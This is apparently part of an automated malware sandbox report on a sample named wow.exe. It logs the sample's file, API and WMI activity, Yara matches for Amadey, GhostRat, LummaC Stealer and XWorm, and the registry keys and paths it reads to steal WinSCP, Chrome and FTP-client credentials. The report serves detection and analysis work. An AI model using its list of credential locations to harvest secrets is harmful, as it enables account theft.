                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\_brotli.cp311-win_amd64.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Downloads\haus\sel1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeQueries volume information: C:\Users\user\Downloads\haus\ABC.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Downloads\haus\traf.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Downloads\haus\amada2.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Downloads\haus\vapo.exeQueries volume information: C:\Users\user\Downloads\haus\vapo.exe VolumeInformation
                            Source: C:\Users\user\Downloads\haus\vapo.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Downloads\haus\ABC.exeQueries volume information: C:\Users\user\Downloads\haus\ABC.exe VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Users\user\Downloads\haus\T.exe VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\conhost.exeQueries volume information: C:\Users\user\Downloads\haus\conhost.exe VolumeInformation
                            Source: C:\Users\user\Downloads\haus\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeQueries volume information: C:\Users\user\Downloads\haus\WatchDog.exe VolumeInformation
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Users\user\Downloads\haus\Enalib.exe VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80BC5E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6D80BC5E0
                            Source: C:\Users\user\Downloads\haus\amada2.exeCode function: 17_2_00403304 GetUserNameA,17_2_00403304
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D6E70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6D80D6E70
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03001EB8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetVersion,16_2_03001EB8
                            Source: C:\Users\user\Downloads\haus\traf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Users\user\Downloads\haus\vapo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\Downloads\haus\T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Amadey bot
                            Source: Yara matchFile source: 00000012.00000002.4627551337.000000000061A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.2274706714.000000000061A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                            Yara detected GhostRat
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wow.exe PID: 6092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Downloads\haus\hausey.txt, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.7890000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.3.wow.exe.1d428d2b790.97.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.7890000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.vapo.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.28fef3c.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4639398920.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000002.4667714199.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2331326155.000001D42C3A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2331326155.000001D42C380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.2876237438.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2272038750.00000000000E2000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2349081758.000001D42C3A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wow.exe PID: 6092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\vapo.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Downloads\haus\vapo.exe, type: DROPPED
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\SmartFTP\Client 2.0\Favorites\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\ConfigFiles\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Layouts\System\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\ConfigFiles\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Layouts\System\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\Far2\Plugins\FTP\Hosts
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FTP Explorer\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
